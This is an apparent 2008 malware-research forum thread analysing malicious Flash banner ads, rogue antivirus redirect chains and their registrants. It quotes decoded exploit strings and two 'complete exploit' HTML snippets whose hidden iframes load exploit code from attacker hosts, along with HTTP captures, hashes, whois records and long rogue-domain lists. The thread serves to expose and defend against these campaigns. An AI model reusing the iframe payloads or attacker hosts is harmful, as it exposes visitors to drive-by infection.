B.I.S.S. Forums > Flash Mystery

B.I.S.S. Forums > Malware News , Research & Removal > Malware Playground

Pages: 1, 2, 3, 4

Kimberly

Jul 9 2008, 01:23 AM

Updated Shockwave / Flash exploit

Remember I did mention a different way to exploit redirects a couple of days ago and the shockwave exploit covered by Kaspersky?

Well it all started last night when I got a popup for a fake online scanner without seeing a Flash malvertizement. So I had to digg a bit further as usual. Going back to the site and stumbling on the same advertisement revealed something interesting in the network capture ... an encoded / obfuscated script as seen below. It might not be the exact source of the fake scanner as I didn't get redirected at the time of the write up. It remains captivating though as it covers yet another aspect of malicious action scripts used in Flash content.

Since I'm curious, I feel the need to decode when possible and what a nifty surprise when I discovered that the script does test which Flash version is installed and leads to a tiny swf file named july1st-firefox-intro.swf.

Inside july1st-firefox-intro.swf we discover 4 important strings:

CODE
String
value: /:$version
String
value: http://202.75.35.72/h/ff/
String
value: i.swf
String
value: _root

Seeing those strings, I realized I did fall on the exploit mentioned in the Kaspersky blog. Further analysis of the file shows that an evolution in obfuscation has taken place. The action script code has been encrypted to better hide the code from researchers.

The initial swf file doesn't have any images either as seen below, just 1 frame and the obfuscated actionscript.

Upon "execution", the value of the Flash Player is added to the i.swf, being WIN 9,0,47,0 for me.

july1st-firefox-intro.swf is part of a bigger "hijack" by adverts. For more information on the main exe file, please refer to Trojan-Downloader.Win32.Firu.al. The Flash exploit has been added to the infection discovered a couple of days ago.

Banner to be displayed: 247mediadirect.com/ad/images/468x60/40381.gif
exe file: script at 247mediadirect.com/jh/f.php?id=9600 which leads to exe
swf file: script at 202.75.35.72/z?i=1&n=6f743fe3724e01adbd202e04be8109e9&t=1215589262

CODE
<HTML><BODY><A HREF="http://247mediadirect.com/action/1/9600/98" TARGET="_blank"><IMG SRC="http://247mediadirect.com/ad/images/468x60/40381.gif"></A><iframe src="http://247mediadirect.com/jh/f.php?id=9600" frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=1 height=1></iframe></BODY></HTML><iframe src="http://202.75.35.72/z?i=1&n=6f743fe3724e01adbd202e04be8109e9&t=1215589262" frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=1 height=1></iframe>

File details

Filename: july1st-firefox-intro.swf

File size: 1332 bytes
MD5...: 47e99b0f5c97e6208d7bab6fa5be8991
SHA1..: 325de729cae0fed62fe47a78bcd9270c31308056
SHA256: cf98da052701fbcaa824f4b489379a6ec5c85237eebba8b8b1499b07ecb21681
PEiD..: -

QUOTE
File july1st-firefox-intro.swf received on 07.09.2008 01:55:09 (CET)
AhnLab-V3 2008.7.9.0 2008.07.08 -
AntiVir 7.8.0.64 2008.07.08 -
Authentium 5.1.0.4 2008.07.08 -
Avast 4.8.1195.0 2008.07.08 SWF:Downloader
AVG 7.5.0.516 2008.07.08 -
BitDefender 7.2 2008.07.08 -
CAT-QuickHeal 9.50 2008.07.08 -
ClamAV 0.93.1 2008.07.09 -
DrWeb 4.44.0.09170 2008.07.08 -
eSafe 7.0.17.0 2008.07.08 -
eTrust-Vet 31.6.5937 2008.07.08 -
Ewido 4.0 2008.07.08 -
F-Prot 4.4.4.56 2008.07.08 -
F-Secure 7.60.13501.0 2008.07.08 -
Fortinet 3.14.0.0 2008.07.08 -
GData 2.0.7306.1023 2008.07.08 SWF:Downloader
Ikarus T3.1.1.26.0 2008.07.09 -
Kaspersky 7.0.0.125 2008.07.09 -
McAfee 5334 2008.07.08 -
Microsoft 1.3704 2008.07.09 -
NOD32v2 3252 2008.07.08 -
Norman 5.80.02 2008.07.08 -
Panda 9.0.0.4 2008.07.08 -
Prevx1 V2 2008.07.09 -
Rising 20.52.12.00 2008.07.08 -
Sophos 4.31.0 2008.07.08 -
Sunbelt 3.1.1509.1 2008.07.04 -
Symantec 10 2008.07.09 -
TheHacker 6.2.96.374 2008.07.07 -
TrendMicro 8.700.0.1004 2008.07.08 -
VBA32 3.12.6.8 2008.07.08 -
VirusBuster 4.5.11.0 2008.07.08 -
Webwasher-Gateway 6.6.2 2008.07.08 -

Kimberly

Jul 10 2008, 04:00 AM

Updated Shockwave / Flash exploit

Some fascinating background information about 247mediadirect.com & 202.75.35.72 is available on Sandi's blog.

FIFTH malvertizement on iEUROP Group : ifrance - isuisse - ibelgique.com - iquebec.com - iespana.es - iitalia.com

Incredible isn't it ? Another malvertizement featuring MediaMan is present:

on the main page of isuisse & iquebec
on the websites hosted on ibelgique & ifrance

How is this possible, I just can't believe it. I got hit by it just after the Forex AutoPilot malvert which is still rotating too.

Screenshot in situ.

Banner.

image.ifrance.com/img/pub/atlantmedia/imediaman728x90.swf

Campaign.

statgroup.net/crossdomain.xml
statgroup.net/c/index.php?id=[removed]

profitabill.com/?cmpid=asbarrator

profitabill.com/?cmpid=asbarrator ... This is the same link as seen in the XM Radio malvertizement. Other interesting point, I think imediaman728x90.swf has been acquired very recently by iEUROP, the date being 9th of July 2008 - 6:12 PM

Very often we notice that websites leave the advertiser's name as a folder's name on their server. Here we see a mention of atlantmedia, so that deserves some digging.

Atlant Media

atlantmedia.net - 87.251.53.87

Website Title: Atlant Media
ICANN Registrar: TLDS, LLC DBA SRSPLUS
Created: 2008-04-14
Expires: 2009-04-14
Updated: 2008-05-16
Name Server: NS1.ATLANTMEDIA.NET (has 1 domains) - 208.79.82.50
Name Server: NS2.ATLANTMEDIA.NET - 208.79.82.66
Name Server: NS3.ATLANTMEDIA.NET - 77.73.98.2
Name Server: NS4.ATLANTMEDIA.NET - 77.73.98.4
Whois Server: whois.srsplus.com

Server Type: Apache/2.2.3 (Debian)
IP Address: 87.251.53.87
IP Location - Netherlands - Bit
Dedicated Hosting: atlantmedia.net is hosted on a dedicated server.

Registrant:
Samanta Lipton (mail@atlantmedia.net)
6 South Avenue
Kingston, NONE 0121
JM
876 920 8447

Domain Name: atlantmedia.net

Administrative, Technical, Billing Contact:
Samanta Lipton (mail@atlantmedia.net)
6 South Avenue
Kingston, NONE 0121
JM
876 920 8447

Domain Service Provider:
SoftSolutions Inc

Regular readers will already have noticed the NS servers which are well known by us. The rest is self-explicit.

domains sharing nameservers.

30plusbill.com
ad2profit.com
adgurman.com
adioserrores.com
adnetserver.com
adsadvertisment.com
adsolutio.com
advancedcleaner.com
adverdaemon.com
advertismentad.com
advertprofit.net
ahorrememoria.com
alfaantivirus.com
alltiettantivirus.com
anchisupaisutsu.com
anchiwamu2008.com
antiespiadorado.com
antiespionspack.com
antigusanos2008.com
antimalwareguard.com
antispionagepro.com
antispypremium.com
antispywarecontrol.com
antispywareexpert.com
antispywaremaster.com
antispywaresuite.com
antiver2008.com
antivirusaskeladd.com
antivirusfiable.com
antivirusforall.com
antivirusforalla.com
antivirusfueralle.com
antivirusgenial.com
antivirusmagique.com
antiviruspcpakke.com
antiviruspcsuite.com
antiviruspertutti.com
antivirusscherm.com
antiworm2008.com
antiwurm2008.com
archivoprotector.com
astalaprofit.com
avsystemcare.com
avsystemshield.com
barreraintegral.com
barrevirus.com
bastioneantivirus.com
bedreigingsmonitoor.com
beschermingstool.com
bestsellerantivirus.com
besutohogo.com
billingbit.com
bizadsonline.net
bizadvert.net
bizmarketads.com
bogyotsuru.com
bortmedvirus.com
bugaganetwork.com
bugdokter.com
bugsdestroyer.com
cerovirus.com
controledemenaces.com
cryptdrive.com
debellaworm2008.com
defensaantimalware.com
defensaantivirus.com
defensedudisque.com
defensenetsurfage.com
diannaoqingjieji.com
digitalerschutz.com
discerrorfree.com
discoseguro.com
discosemerros.com
discosenzaerrori.com
discosinerrores.com
diskfejlfri.com
diskrensare.com
diskretter.com
disqudurprotection.com
dobleproteccion.com
doraibuhogo.com
downloadcontrol.com
drivecleaner.com
drivedefender.com
driveproteccion.com
dwnld1.com
easydownloadsoft.com
easyfixer.com
einaprivadesapc.com
elmejorantivirus.com
elmejorcuidado.com
erreurchasseur.com
errorfri.com
errorout.com
errorprotector.com
errorsafe.com
errorskydd.com
errorsoshi.com
exterminadordevirus.com
fairukyua.com
fehlerbeseitiger.com
fejlrenser.com
festplattencleaner.com
festplattenreiniger.com
fiksdinpc.com
filtrodetrojan.com
filtrototal.com
filtrotroiani.com
fullsystemprotection.com
geeninfectie.com
glorymarkets.com
goldenantispy.com
googiesindication.com
gorudenanchisupai.com
hadodoraibugado.com
harddiskvakt.com
harddrivefilter.com
harddriveguard.com
inhaltspeicher.com
internetanonymizer.com
intervarioclick.com
keinegefahr.com
konsekieraser.com
kyoikanshi.com
kyouikyuuen.com
libresystem.com
limpietodo.com
malwareschutz.com
maximumantivirus.com
meinbesterschutz.com
menacecontrole.com
menacerescue.com
menacesecure.com
menacesprotection.com
miavcompleto.com
minnesparere.com
mistikotitatuipologisti.com
moncontenuassistant.com
munazifalhasob.com
mythmarketing.com
nettordinateur.com
nettoyeurdepc.com
neuerschild.com
nientetracce.com
nocompromaat.com
norwayvirus.com
nowayvirus.com
oczyszczaczkomputerza.com
onerateld.com
onlinehelpmate.com
onlinepcguard.com
orantiespion.com
ordureffaceur.com
pc-prot.com
pcantivirenloesung.com
pcbeskyttelse.com
pckairyo.com
pcprivacycleaner.com
pcprivacytool.com
pcpropre.com
pcrengoringsmaskine.com
pcsecuresystem.com
pcsegura.com
pcsentineru.com
pcsiemprenueva.com
pcsikker.com
pcsikkerhed.com
pcsod.com
pcsupernanny.com
pcvirusless.com
pembersihkomputer.com
plattefehlerfrei.com
popadprovider.com
poupememoria.com
pp-total.com
prevedmarketing.com
privacidadeprotegida.com
privacyprotector.com
profitabill.com
proteccionconfiable.com
protectdownloads.com
protectingtool.com
protectionassuree.com
protectionconue.com
protejaseudrive.com
protejasudrive.com
protezionefidata.com
protezionesoft.com
puliturasystem.com
r2d2adverising.com
regrensere.com
rejishufuku.com
reparateurdesysteme.com
rescatedeamenazas.com
riendevirus.com
rocktheads.com
safetydownload.com
sanitardiska.com
savecapacite.com
schijfbewaker.com
schijfhersteller.com
schutztool.com
securepccleaner.com
semerros.com
senzadoppioni.com
senzaerrori.com
sichererantivirus.com
sichererschutz.com
sikkerpcvaerktoj.com
sistemadedefensa.com
sistemaimune.com
skyddsverktyg.com
sletingenvirus.com
software-payment.com
solutionreg.com
speicherschutz.com
stoltbeskyttelse.com
storageguardsoft.com
storageprotector.com
suiteantispyware.com
sumejorantivirus.com
supashuri.com
suspenzorpc.com
sutoppuwirusu.com
sysdepannage.com
syskontroller.com
syslibero.com
sysprotect.com
systemdoctor.com
systemerrorfixer.com
systemesansvirus.com
systemordnare.com
toolsicuro.com
topsalgantivirus.com
toroianfiruta.com
trasheraser.com
trojanerfilter.com
trojansfilter.com
trojansfiltre.com
trustedantivirus.com
trustedprotection.com
tryggdator.com
tryggpcverktyg.com
turvapc.com
vacinatotal.com
veiligheidsagent.com
vipantispyware.com
virenfrierpc.com
virtualcoin.net
virtualpcguard.com
viruscontrolleuer.com
virusdeteccion.com
virusdifesa.com
viruseffaceur.com
virusforsvar.com
virusfrittsystem.com
virusremover2008.com
virusstopper.net
virusuwadame.com
virusvakt.com
virusvanguard.com
viruswacht.com
votremeilleurantivirus.com
waytotheprofit.com
winanonymous.com
winantispyware.com
winantivirus.com
winantiviruspro.com
winfixer.com
winpcdoctor.com
winsecureav.com
winsoftware.com
winspycontrol.com
yourprivacyguard.com
yuzasefu.com
zebraantivirus.com
zeusantivirus.com

No doubt, Atlant Media is yet another dodgy, bad advertising company. If you have been approached by people representing them check your creatives please at Adopstools or contact us.

Circulating malvertizements

Courtesy of Sandi.

Classmates.

More info.
______________________________

Skype.

More info.

Kimberly

Jul 13 2008, 04:24 AM

Warning

The bad guys are pulling of a new stunt when you are a victim of a redirect. Everyone has already used copy and paste at least once in his / her life to pass links into your browser. Upon the redirect, one of the bad URL is copied into your clipboard. So let's presume that just before it happed you had a website link in your clipboard, the redirect happens, you close all your windows with ALT+F4 and you decide to go back to the initial website using the paste function ... Wrong because you now have a bad URL in your clipboard.

How to get quickly rid of it?

Click Start > Run
In the edit box type clipbrd followed by enter.
The actual content of the clipboard will be displayed.
Click the delete button and confirm by Yes.

Furthermore I did notice that they had wiped isuisse.com (where the redirect did occur) from my Internet History list.

Kimberly

Jul 13 2008, 06:23 PM

Malvertizements - Another way of spreading

Ever wondered why so many malicious banners are laying around on Internet? Well here is another method of spreading malvertizements. The banner is 1 year old (gives an idea how long these redirects are going on already) ... it's the method used by those scammers that is disgusting.

You love Myspace / Xanga / Friendster / Hi5 stuff? Let's head towards www.funmunch.com then. See the Myspace Banners link?

When clicked, you are taken to the banner directory and wow a Flash file ...

Banner.

www.funmunch.com/banners/media.swf

Adopstools Test.

http://www.adopstools.com/index.asp?page=quicklink&id=2907h69B4n4rNAc1

Before using Flash banners on your MySpace profile (or elsewhere) check if they are clean at Adops Tools!!!

Kimberly

Jul 14 2008, 09:07 PM

Circulating malvertizements

Courtesy of Sandi.

Dreammates.

Note: Rescaled due to visibility - original size: 800x600

Campaign.

page2.googiesindication.com/c/index.php?id=[removed]
waytotheprofit.com/?cmpid=noanalysis&adid=intl

More info.
______________________________

Much Music.

Campaign.

statgroup.net/c/index.php?id=[removed]
waytotheprofit.com/?cmpid=ontitivate&adid=intl

More info.

Kimberly

Jul 14 2008, 11:56 PM

New kidz on the block

Two new friends of our well known adtds.trackads.net / adtds2.promoplexer.com domains are active.

internetsecuritydeluxe.com - 67.205.75.12

CODE
GET /in.cgi?22 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adtds.trackads.net
Connection: Keep-Alive

HTTP/1.1 302 Found
Set-Cookie: SL_22_0000=_2_; domain=adtds2.promoplexer.com; path=/; expires=Tue, 15-Jul-2008 23:35:33 GMT
Location: http://internetsecuritydeluxe.com/scanner/scan.php?landid=2&depid=&cid=&parid=&bs=1
Content-type: text/html
Content-Length: 294
Date: Mon, 14 Jul 2008 23:35:33 GMT
Server: lighttpd/1.5.0

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://internetsecuritydeluxe.com/scanner/scan.php?landid=2&depid=&cid=&parid=&bs=1'">
</head>
<body>
document moved <a href="http://internetsecuritydeluxe.com/scanner/scan.php?landid=2&depid=&cid=&parid=&bs=1">here</a>
</body>
</html>

Website Title: .: InternetSecurityDeluxe - the best antispyware, antimalware ever :.

ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-04-22
Expires: 2009-04-22
Updated: 2008-06-27
Name Server: NS.INTERNETSECURITYDELUXE.COM (has 1 domains)
Name Server: NS1.INTERNETSECURITYDELUXE.COM
Name Server: NS2.INTERNETSECURITYDELUXE.COM
Whois Server: whois.estdomains.com

Server Type: lighttpd/1.4.18
IP Address: 67.205.75.12
IP Location - Ukraine - Individual

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: INTERNETSECURITYDELUXE.COM

Registrant:
Ind
Vasil pentykovich (leonardo126@gmail.com)
Ny tipa normalnij address
Shoblo
Other,20365
PR
Tel. +023.2569856
Fax. +023.5565599

Administrative Contact:
Ind
Vasil pentykovich (leonardo126@gmail.com)
Ny tipa normalnij address
Shoblo
Other,20365
PR
Tel. +023.2569856
Fax. +023.5565599

Technical Contact:
Ind
Vasil pentykovich (leonardo126@gmail.com)
Ny tipa normalnij address
Shoblo
Other,20365
PR
Tel. +023.2569856
Fax. +023.5565599

Billing Contact:
Ind
Vasil pentykovich (leonardo126@gmail.com)
Ny tipa normalnij address
Shoblo
Other,20365
PR
Tel. +023.2569856
Fax. +023.5565599
______________________________

scanner.vav-scan.com / *.vav-scan.com - 92.241.182.16

CODE
GET /in.cgi?2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adtds.trackads.net
Connection: Keep-Alive

HTTP/1.1 302 Found
Set-Cookie: SL_2_0000=_6_; domain=adtds2.promoplexer.com; path=/; expires=Tue, 15-Jul-2008 23:38:30 GMT
Set-Cookie: SL_12_0000=_3_; domain=adtds2.promoplexer.com; path=/; expires=Tue, 15-Jul-2008 23:38:30 GMT
Location: http://scanner.vav-scan.com/29/?advid=4925&ref=&p=1000000000
Content-type: text/html
Content-Length: 248
Date: Mon, 14 Jul 2008 23:38:30 GMT
Server: lighttpd/1.5.0

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://scanner.vav-scan.com/29/?advid=4925&ref=&p=1000000000'">
</head>
<body>
document moved <a href="http://scanner.vav-scan.com/29/?advid=4925&ref=&p=1000000000">here</a>
</body>
</html>

Website Title: Welcome to nginx!

ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-05-28
Expires: 2009-05-28
Updated: 2008-07-14
Name Server: NS1.VAV-SCAN.COM (has 1 domains)
Name Server: NS2.VAV-SCAN.COM
Whois Server: whois.estdomains.com

IP Address: 92.241.182.16
IP Location - Russian Federation - Wahome Colocation

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: VAV-SCAN.COM

Registrant:
Sawert Alliance ltd.
Leonid Sherbakov (selevitenterprises@gmail.com)
P.O. Box 3567, Road Town
Tortola
Not Applicable,N/A
VG
Tel. +7.9602578790

Administrative Contact:
Sawert Alliance ltd.
Leonid Sherbakov (selevitenterprises@gmail.com)
P.O. Box 3567, Road Town
Tortola
Not Applicable,N/A
VG
Tel. +7.9602578790

Technical Contact:
Sawert Alliance ltd.
Leonid Sherbakov (selevitenterprises@gmail.com)
P.O. Box 3567, Road Town
Tortola
Not Applicable,N/A
VG
Tel. +7.9602578790

Billing Contact:
Sawert Alliance ltd.
Leonid Sherbakov (selevitenterprises@gmail.com)
P.O. Box 3567, Road Town
Tortola
Not Applicable,N/A
VG
Tel. +7.9602578790

Websites.

Vav-scan.com
Vav-scanner.com
Vavscan.com

Kimberly

Jul 15 2008, 04:43 AM

Circulating malvertizements

Courtesy of Sandi.

Levi's.

More info.
______________________________

Lexus - myownpoursuit.com.

More info.
______________________________

Lady SpeedStick.

The original malvertizement has been replaced with a "cleaned" one already. We have seen this happen before when hosted on their own "advert servers".
More info.
______________________________

XM Radio.

Another sample of XM Radio featuring the same campaign as the one seen on ifrance & co.
More info.

Kimberly

Jul 16 2008, 02:28 AM

Updated Shockwave / Flash exploit

Another Flash file, smaller as the one mentioned here because packed this time (packers Kaspersky: Swf2Swc) and a new domain, 21centmedia.com which is serving the same exploits and redirects as 247mediadirect.com. Ref.

Again we see a script to decode.

Decoded we see again the same Flash test and a link to a tiny swf file named ff.swf.

Inside ff.swf we discover 4 important strings:

CODE
String
value: /:$version
String
value: http://209.47.164.209/h/ff/
String
value: swf
String
value: _root

The action script code has been encrypted again, ff.swf doesn't have any images either. Upon "execution", the value of the Flash Player is added to the swf, being WIN 9,0,47,0 for me.
Whoops sloppy coders, they kinda messed up this one since the dot is missing between the filename & file extension.

CODE
GET /h/ff/WIN%209,0,47,0swf HTTP/1.1
Accept: */*
Referer: [removed]
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 209.47.164.209
Connection: Keep-Alive

Complete exploit:

CODE
<HTML><BODY><A HREF="http://21centmedia.com/route/1/5919/117" TARGET="_blank"><IMG SRC="http://21centmedia.com/banner/images/468x60/84489.jpg"></A><iframe src="http://21centmedia.com/xo/a.php?id=5919" frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=1 height=1></iframe></BODY></HTML><iframe src="http://209.47.164.209/z?i=1&n=4f6e8320e1ae5ca898cca282b69215e5&t=1216170914" frameborder=0
marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=1 height=1></iframe>

File details

Filename: ff.swf

File size: 764 bytes
MD5...: d8081ca147f2369b0862db2341e8aa0d
SHA1..: 0c07fb184060123006a1edb4587cfd040abc2ab4
SHA256: 51de9f0d310f933f5d92466a5bd754b50effc4b39c38a506d3a7ea2c8f8a6fa9
PEiD..: -

QUOTE
File ff.swf received on 07.16.2008 03:36:03 (CET)
AhnLab-V3 2008.7.11.0 2008.07.15 -
AntiVir 7.8.0.68 2008.07.15 -
Authentium 5.1.0.4 2008.07.15 -
Avast 4.8.1195.0 2008.07.15 SWF:Downloader
AVG 7.5.0.516 2008.07.15 -
BitDefender 7.2 2008.07.16 -
CAT-QuickHeal 9.50 2008.07.15 -
ClamAV 0.93.1 2008.07.16 -
DrWeb 4.44.0.09170 2008.07.15 -
eSafe 7.0.17.0 2008.07.15 -
eTrust-Vet 31.6.5956 2008.07.15 -
Ewido 4.0 2008.07.15 -
F-Prot 4.4.4.56 2008.07.15 -
F-Secure 7.60.13501.0 2008.07.16 -
Fortinet 3.14.0.0 2008.07.16 -
GData 2.0.7306.1023 2008.07.16 SWF:Downloader
Ikarus T3.1.1.26.0 2008.07.16 Virus.SWF.Downloader
Kaspersky 7.0.0.125 2008.07.15 -
McAfee 5339 2008.07.15 -
Microsoft 1.3704 2008.07.15 -
NOD32v2 3270 2008.07.15 -
Norman 5.80.02 2008.07.15 -
Panda 9.0.0.4 2008.07.15 -
Prevx1 V2 2008.07.16 -
Rising 20.53.12.00 2008.07.15 -
Sophos 4.31.0 2008.07.16 -
Sunbelt 3.1.1536.1 2008.07.15 -
Symantec 10 2008.07.16 -
TheHacker 6.2.96.381 2008.07.16 -
TrendMicro 8.700.0.1004 2008.07.15 -
VBA32 3.12.8.0 2008.07.15 -
VirusBuster 4.5.11.0 2008.07.15 -
Webwasher-Gateway 6.6.2 2008.07.16 -

21centmedia.com - 209.47.164.209

Same registrant as 247mediadirect.com.

21centmedia.com - 209.47.164.209.

Website Title: None given.
ICANN Registrar: INTERCOSMOS MEDIA GROUP, INC. D/B/A DIRECTNIC.COM
Created: 2008-05-29
Expires: 2009-05-29
Updated: 2008-05-29
Name Server: NS0.DIRECTNIC.COM (has 354,650 domains)
Name Server: NS1.DIRECTNIC.COM
Whois Server: whois.directnic.com

IP Address: 209.47.164.209
IP Location - United States - Mci Communications Services Inc. D/b/a Verizon Business
Dedicated Hosting: 21centmedia.com is hosted on a dedicated server.

Registrant:
Media Hosting Ltd.
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830

Domain Name: 21CENTMEDIA.COM

Administrative Contact:
Pearson, Ross
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830

Technical Contact:
Pearson, Ross
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830

Record expires on 05-29-2009
Record created on 05-29-2008

Domain servers in listed order:
NS0.DIRECTNIC.COM 69.46.233.245
NS1.DIRECTNIC.COM 69.46.234.245

Kimberly

Jul 17 2008, 11:30 PM

Updated TravelWise banner

Forwarded to us by a contact. The TravelWise malvertizement has been seen in the past in its 460x60 version on different occasions.

First discovered on April 3th.
Live on Photobucket on April 12th.
Live on Release Log on May 9th.

Today a 728x90 version of this banner is circulating.

Banner.

Campaign.

stathisranch.com/c/index.php?id=[removed]
waytotheprofit.com/?cmpid=usboeotian&adid=intl

Kimberly

Jul 19 2008, 05:40 PM

softtraf.com

adtds.trackads.net / adtds2.promoplexer.com have activated a new domain: softtraf.com

softtraf.com/go.php?id=[removed]

Depending on the id= people will get redirected to different fake online scanners. At Domain Tools, softtraf.com is still listed under 92.241.182.14 but the website actually resolves to 91.208.0.244.
scanner.vav-scan.com has been moved into that range also. We notice a couple of other domains that correspond to the id= redirects.

softtraf.com - 91.208.0.244

Registry Data
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-05-16
Expires: 2009-05-16
Updated: 2008-07-16
Registrar Status: ok
Name Server: ns1.softtraf.com 91.208.0.244
Name Server: ns2.softtraf.com 220.196.42.220
Whois Server: whois.estdomains.com

Whois Record
Domain Name: SOFTTRAF.COM

Registrant:
Sawert Alliance ltd.
Peltonen Martti (seodancer@gmail.com)
Jeledoroznaya str. 14
Volovoso
Leningradskaya oblast,188410
RU
Tel. +7.9218901266

Administrative Contact:
Sawert Alliance ltd.
Peltonen Martti (seodancer@gmail.com)
Jeledoroznaya str. 14
Volovoso
Leningradskaya oblast,188410
RU
Tel. +7.9218901266

Technical Contact:
Sawert Alliance ltd.
Peltonen Martti (seodancer@gmail.com)
Jeledoroznaya str. 14
Volovoso
Leningradskaya oblast,188410
RU
Tel. +7.9218901266

Billing Contact:
Sawert Alliance ltd.
Peltonen Martti (seodancer@gmail.com)
Jeledoroznaya str. 14
Volovoso
Leningradskaya oblast,188410
RU
Tel. +7.9218901266

Websites.

Pornonod.com
Softtraf.com
Softtrafik.com
Software-traff.com
Software-traffic.com
Softwaretraff.com

______________________________

91.208.0.241

*.privacy-watcher.com CNAME
ns1.privacy-watcher.com A
ns1.winsafer.com A
privacy-watcher.com A
scanner.privacy-watcher.com CNAME
winsafer.com A
______________________________

91.208.0.244

*.softtraf.com CNAME
*.softtrafik.com CNAME
mail.softtraf.com A
mail.softtrafik.com A
ns1.softtraf.com A
ns1.softtrafik.com A
softtraf.com A
softtrafik.com A
______________________________

91.208.0.246

*.vav-scan.com CNAME
*.vav-x-scanner.com CNAME
mail.vav-scan.com A
mail.vav-x-scanner.com A
ns1.vav-scan.com A
ns1.vav-x-scanner.com A
ns2.vav-scan.com A
ns2.vav-x-scanner.com A
scanner.vav-scan.com CNAME
scanner.vav-x-scanner.com CNAME
vav-scan.com A
vav-x-scanner.com A
______________________________

91.208.0.250

ns2.winxprotector.com A
______________________________

91.208.0.252

*.anvi-scanner.com CNAME
anvi-scanner.com A
mail.anvi-scanner.com A
ns1.anvi-scanner.com A
ns2.anvi-scanner.com A
scanner.anvi-scanner.com CNAME
______________________________

220.196.42.220

*.magicantispy.com CNAME
*.malware-alarm.com CNAME
*.malwarealarm.com CNAME
*.scanner.xmalwarealarm.com CNAME
*.winxprotector.com CNAME
malware-alarm.com A
malwarealarm.com A
ns1.malware-alarm.com A
ns1.malwarealarm.com A
ns1.winxdefender.com A
ns1.winxprotector.com A
ns2.malwarealarm.com A
ns2.malwscan.com A
ns2.softtraf.com A
ns2.softtrafik.com A
ns2.watcher-scan.com A
ns2.winxdefender.com A
ns3.winxprotector.com CNAME
scanner.xmalwarealarm.com CNAME
spyshredderscanner.com A
winsafesurf.com A
winxdefender.com A
winxprotector.com A
www.scanner.xmalwarealarm.com CNAME

Websites (According to Domain Tools).

Adwareremover2007.com
Drives-cleaner.com
Magicantispy.com
Malware-alarm.com
Malwarealarm-scanner.com
Malwarealarm.com
Malwarealarms.com
Spy-shredder.com
Spy-xshredder.com
Spyshredder-scanner.com
Spyshredderscanner.com
Spyware-sweeper.net
Thecleanersystem.com
Vsoftstore.com
Windowsafesurf.com
Winsafesurf.com
Winsavesurf.com
Winxdefender.com
X-malwarealarm.com
Xmalwarealarm.com
Xspy-shredder.com
Xxxmovieshare.com

______________________________

Information related to '91.208.0.0 - 91.208.0.255'

inetnum: 91.208.0.0 - 91.208.0.255
netname: STILLTRADE-NET
descr: Still Trade Ltd
country: RU
org: ORG-STIL1-RIPE
admin-c: PERE1-RIPE
tech-c: PERE1-RIPE
status: ASSIGNED PI
notify: lexa@wahome.ru
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-by: STILLTRADE-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-routes: STILLTRADE-MNT
mnt-domains: STILLTRADE-MNT
changed: hostmaster@ripe.net 20080625
source: RIPE

organisation: ORG-STIL1-RIPE
org-name: Still Trade Ltd
org-type: OTHER
address: Russian Federation,
address: St. Petersburg, Fedosenko st, 30 liter A, 24-N
e-mail: corp@still-trade.com
mnt-ref: RU-WEBALTA-MNT
mnt-by: STILLTRADE-MNT
changed: lexa@wahome.ru 20080624
source: RIPE

person: Perevitskiy Sergey
address: Russian Federation,
address: St. Petersburg, Fedosenko st, 30 liter A, 24-N
mnt-by: STILLTRADE-MNT
abuse-mailbox: abuse@still-trade.com
e-mail: perevitzky.sergey@still-trade.com
phone: +7 (960) 257-87-90
nic-hdl: PERE1-RIPE
changed: lexa@wahome.ru 20080624
source: RIPE

Information related to '91.208.0.0/24AS47486'

route: 91.208.0.0/24
descr: Still Trade Ltd
origin: AS47486
mnt-by: STILLTRADE-MNT
changed: lexa@wahome.ru 20080625
source: RIPE
______________________________

Information related to '220.192.0.0 - 220.207.255.255'

inetnum: 220.192.0.0 - 220.207.255.255
netname: UNICOM
descr: China United Telecommunications Corporation
descr: No.133,Taiyun Building,Xidan North Street
descr: Xicheng District,Beijing,China
country: CN
admin-c: JY1446-AP
tech-c: JY1446-AP
mnt-by: MAINT-CNNIC-AP
mnt-lower: MAINT-CNNIC-AP
mnt-routes: MAINT-CNNIC-AP
status: ALLOCATED PORTABLE
changed: ipas@cnnic.cn 20070731
changed: hm-changed@apnic.net 20070802
source: APNIC

person: Jin Yang
address: No.133,Taiyun Building,Xidan North Street
address: Xicheng District,Beijing,China
country: CN
phone: +86-10-66505588
fax-no: +86-10-66504252
e-mail: ip_address@cnuninet.com
nic-hdl: JY1446-AP
mnt-by: MAINT-CNNIC-AP
changed: ipas@cnnic.cn 20070828
source: APNIC

inetnum: 220.192.0.0 - 220.207.255.255
netname: UNICOM
descr: China United Telecommunications Corporation
descr: No.133,Taiyun Building,Xidan North Street
descr: Xicheng District,Beijing,China
country: CN
admin-c: JY7-CN
tech-c: JY7-CN
mnt-by: MAINT-CNNIC-AP
